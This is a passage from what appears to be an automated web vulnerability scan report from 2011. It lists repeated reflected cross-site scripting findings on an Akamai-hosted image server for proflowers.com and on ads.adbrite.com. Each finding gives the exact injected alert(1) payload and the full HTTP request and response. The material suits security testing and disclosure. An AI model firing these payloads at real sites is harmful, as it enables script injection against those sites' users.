The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload dde05<img%20src%3da%20onerror%3dalert(1)>7b7dbc8df13 was submitted in the REST URL parameter 9. This input was echoed as dde05<img src=a onerror=alert(1)>7b7dbc8df13 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000007H355_69865_W2_SQdde05<img%20src%3da%20onerror%3dalert(1)>7b7dbc8df13?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.personalcreations.com/?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&Keyword=PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp_html&Network=Casale_Media
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 106
Cache-Control: no-store
Date: Sun, 04 Sep 2011 01:05:00 GMT
Connection: close

Unable to find /ProvideCommerce/PCR10_00000007H355_69865_W2_SQdde05<img src=a onerror=alert(1)>7b7dbc8df13

5.14. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000008H201_82170_W2_SQ [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000008H201_82170_W2_SQ

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload b5852<img%20src%3da%20onerror%3dalert(1)>e0c47f2adfe was submitted in the REST URL parameter 9. This input was echoed as b5852<img src=a onerror=alert(1)>e0c47f2adfe in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000008H201_82170_W2_SQb5852<img%20src%3da%20onerror%3dalert(1)>e0c47f2adfe?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.personalcreations.com/?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&Keyword=PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp_html&Network=Casale_Media
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 106
Cache-Control: no-store
Date: Sun, 04 Sep 2011 01:05:38 GMT
Connection: close

Unable to find /ProvideCommerce/PCR10_00000008H201_82170_W2_SQb5852<img src=a onerror=alert(1)>e0c47f2adfe

5.15. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000008H203_82172_W1_SQ [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000008H203_82172_W1_SQ

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 5dc38<img%20src%3da%20onerror%3dalert(1)>73585b63516 was submitted in the REST URL parameter 9. This input was echoed as 5dc38<img src=a onerror=alert(1)>73585b63516 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000008H203_82172_W1_SQ5dc38<img%20src%3da%20onerror%3dalert(1)>73585b63516?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.personalcreations.com/?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&Keyword=PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp_html&Network=Casale_Media
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 106
Cache-Control: no-store
Date: Sun, 04 Sep 2011 01:05:39 GMT
Connection: close

Unable to find /ProvideCommerce/PCR10_00000008H203_82172_W1_SQ5dc38<img src=a onerror=alert(1)>73585b63516

5.16. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000010D01X_103184_W1 [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000010D01X_103184_W1

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload fd9b1<img%20src%3da%20onerror%3dalert(1)>c9ece6814af was submitted in the REST URL parameter 9. This input was echoed as fd9b1<img src=a onerror=alert(1)>c9ece6814af in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000010D01X_103184_W1fd9b1<img%20src%3da%20onerror%3dalert(1)>c9ece6814af?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.personalcreations.com/?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&Keyword=PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp_html&Network=Casale_Media
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 104
Cache-Control: no-store
Date: Sun, 04 Sep 2011 01:06:34 GMT
Connection: close

Unable to find /ProvideCommerce/PCR10_00000010D01X_103184_W1fd9b1<img src=a onerror=alert(1)>c9ece6814af

5.17. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_0000008G370X_85066_W7_SQ [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_0000008G370X_85066_W7_SQ

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload bf8d3<img%20src%3da%20onerror%3dalert(1)>4c20501340f was submitted in the REST URL parameter 9. This input was echoed as bf8d3<img src=a onerror=alert(1)>4c20501340f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_0000008G370X_85066_W7_SQbf8d3<img%20src%3da%20onerror%3dalert(1)>4c20501340f?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.personalcreations.com/?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&Keyword=PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp_html&Network=Casale_Media
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 106
Cache-Control: no-store
Date: Sun, 04 Sep 2011 01:06:34 GMT
Connection: close

Unable to find /ProvideCommerce/PCR10_0000008G370X_85066_W7_SQbf8d3<img src=a onerror=alert(1)>4c20501340f

5.18. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_0000009A230X_85266_W1_SQ [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_0000009A230X_85266_W1_SQ

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload dc8f1<img%20src%3da%20onerror%3dalert(1)>351d0d588f3 was submitted in the REST URL parameter 9. This input was echoed as dc8f1<img src=a onerror=alert(1)>351d0d588f3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_0000009A230X_85266_W1_SQdc8f1<img%20src%3da%20onerror%3dalert(1)>351d0d588f3?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.personalcreations.com/?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&Keyword=PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp_html&Network=Casale_Media
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 106
Cache-Control: no-store
Date: Sun, 04 Sep 2011 01:05:46 GMT
Connection: close

Unable to find /ProvideCommerce/PCR10_0000009A230X_85266_W1_SQdc8f1<img src=a onerror=alert(1)>351d0d588f3

5.19. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR11_000000011F48_0138343_W1_SQ [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR11_000000011F48_0138343_W1_SQ

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload d3241<img%20src%3da%20onerror%3dalert(1)>b814b4c37bb was submitted in the REST URL parameter 9. This input was echoed as d3241<img src=a onerror=alert(1)>b814b4c37bb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR11_000000011F48_0138343_W1_SQd3241<img%20src%3da%20onerror%3dalert(1)>b814b4c37bb?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.personalcreations.com/?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&Keyword=PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp_html&Network=Casale_Media
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 108
Cache-Control: no-store
Date: Sun, 04 Sep 2011 01:04:55 GMT
Connection: close

Unable to find /ProvideCommerce/PCR11_000000011F48_0138343_W1_SQd3241<img src=a onerror=alert(1)>b814b4c37bb

5.20. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR11_00000002352X_0049859_W1_SQ [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR11_00000002352X_0049859_W1_SQ

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 6af88<img%20src%3da%20onerror%3dalert(1)>3334b396171 was submitted in the REST URL parameter 9. This input was echoed as 6af88<img src=a onerror=alert(1)>3334b396171 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR11_00000002352X_0049859_W1_SQ6af88<img%20src%3da%20onerror%3dalert(1)>3334b396171?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.personalcreations.com/?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&Keyword=PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp_html&Network=Casale_Media
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 108
Cache-Control: no-store
Date: Sun, 04 Sep 2011 01:05:35 GMT
Connection: close

Unable to find /ProvideCommerce/PCR11_00000002352X_0049859_W1_SQ6af88<img src=a onerror=alert(1)>3334b396171

5.21. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR11_00000011A98X_114727_W1 [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR11_00000011A98X_114727_W1

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 908f9<img%20src%3da%20onerror%3dalert(1)>5ff4f03be4a was submitted in the REST URL parameter 9. This input was echoed as 908f9<img src=a onerror=alert(1)>5ff4f03be4a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR11_00000011A98X_114727_W1908f9<img%20src%3da%20onerror%3dalert(1)>5ff4f03be4a?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.personalcreations.com/?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&Keyword=PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp_html&Network=Casale_Media
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 104
Cache-Control: no-store
Date: Sun, 04 Sep 2011 01:05:57 GMT
Connection: close

Unable to find /ProvideCommerce/PCR11_00000011A98X_114727_W1908f9<img src=a onerror=alert(1)>5ff4f03be4a

5.22. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR11_0000009G125X_0090481_W2_SQ [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR11_0000009G125X_0090481_W2_SQ

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 5b198<img%20src%3da%20onerror%3dalert(1)>c4c8409ea3e was submitted in the REST URL parameter 9. This input was echoed as 5b198<img src=a onerror=alert(1)>c4c8409ea3e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR11_0000009G125X_0090481_W2_SQ5b198<img%20src%3da%20onerror%3dalert(1)>c4c8409ea3e?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.personalcreations.com/?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&Keyword=PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp_html&Network=Casale_Media
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 108
Cache-Control: no-store
Date: Sun, 04 Sep 2011 01:05:27 GMT
Connection: close

Unable to find /ProvideCommerce/PCR11_0000009G125X_0090481_W2_SQ5b198<img src=a onerror=alert(1)>c4c8409ea3e

5.23. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR11_0000011F111X_0138942_W1_SQ [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR11_0000011F111X_0138942_W1_SQ

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 231ab<img%20src%3da%20onerror%3dalert(1)>e6d8d6db049 was submitted in the REST URL parameter 9. This input was echoed as 231ab<img src=a onerror=alert(1)>e6d8d6db049 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR11_0000011F111X_0138942_W1_SQ231ab<img%20src%3da%20onerror%3dalert(1)>e6d8d6db049?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.personalcreations.com/?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&Keyword=PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp_html&Network=Casale_Media
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 108
Cache-Control: no-store
Date: Sun, 04 Sep 2011 01:04:58 GMT
Connection: close

Unable to find /ProvideCommerce/PCR11_0000011F111X_0138942_W1_SQ231ab<img src=a onerror=alert(1)>e6d8d6db049

5.24. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR11_0000011G128X_0134102_W1_SQ [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR11_0000011G128X_0134102_W1_SQ

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload e2157<img%20src%3da%20onerror%3dalert(1)>5531a670ae2 was submitted in the REST URL parameter 9. This input was echoed as e2157<img src=a onerror=alert(1)>5531a670ae2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR11_0000011G128X_0134102_W1_SQe2157<img%20src%3da%20onerror%3dalert(1)>5531a670ae2?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.personalcreations.com/?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&Keyword=PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp_html&Network=Casale_Media
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 108
Cache-Control: no-store
Date: Sun, 04 Sep 2011 01:05:54 GMT
Connection: close

Unable to find /ProvideCommerce/PCR11_0000011G128X_0134102_W1_SQe2157<img src=a onerror=alert(1)>5531a670ae2

5.25. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR11_0000011G242X_0136242_W1_SQ [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR11_0000011G242X_0136242_W1_SQ

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 4b059<img%20src%3da%20onerror%3dalert(1)>6709cddd430 was submitted in the REST URL parameter 9. This input was echoed as 4b059<img src=a onerror=alert(1)>6709cddd430 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR11_0000011G242X_0136242_W1_SQ4b059<img%20src%3da%20onerror%3dalert(1)>6709cddd430?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.personalcreations.com/?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&Keyword=PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp_html&Network=Casale_Media
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 108
Cache-Control: no-store
Date: Sun, 04 Sep 2011 01:05:43 GMT
Connection: close

Unable to find /ProvideCommerce/PCR11_0000011G242X_0136242_W1_SQ4b059<img src=a onerror=alert(1)>6709cddd430

5.26. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/p0084749b [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/p0084749b

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 76672<img%20src%3da%20onerror%3dalert(1)>2c03fb67eb4 was submitted in the REST URL parameter 9. This input was echoed as 76672<img src=a onerror=alert(1)>2c03fb67eb4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/p0084749b76672<img%20src%3da%20onerror%3dalert(1)>2c03fb67eb4?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.personalcreations.com/?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&Keyword=PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp_html&Network=Casale_Media
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 85
Cache-Control: no-store
Date: Sun, 04 Sep 2011 01:06:20 GMT
Connection: close

Unable to find /ProvideCommerce/p0084749b76672<img src=a onerror=alert(1)>2c03fb67eb4

5.27. http://ads.adbrite.com/adserver/vdi/742697 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.adbrite.com
Path:   /adserver/vdi/742697

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload ebb35<script>alert(1)</script>63fe973072f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adserver/vdi/742697ebb35<script>alert(1)</script>63fe973072f?d=2925993182975414771 HTTP/1.1
Host: ads.adbrite.com
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=2925993182975414771&mktid=27&mpid=3808468&fpid=-1&rnd=7044539534532983673&nu=n&sp=n&ctid=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168296542x0.096+1314892454x-365710891"; rb2=EAE; ut="1%3Aq1YqM1KyqlbKTq0szy9KKVayUirOLM3IrzEsr0xMN6sxqjEsyShW0lFKSszLSy3KBKtQqq0FAA%3D%3D"; vsd=0@1@4e60f636@www.garage4hackers.com

Response

HTTP/1.1 400 Bad Request
Accept-Ranges: none
Date: Sun, 04 Sep 2011 00:59:04 GMT
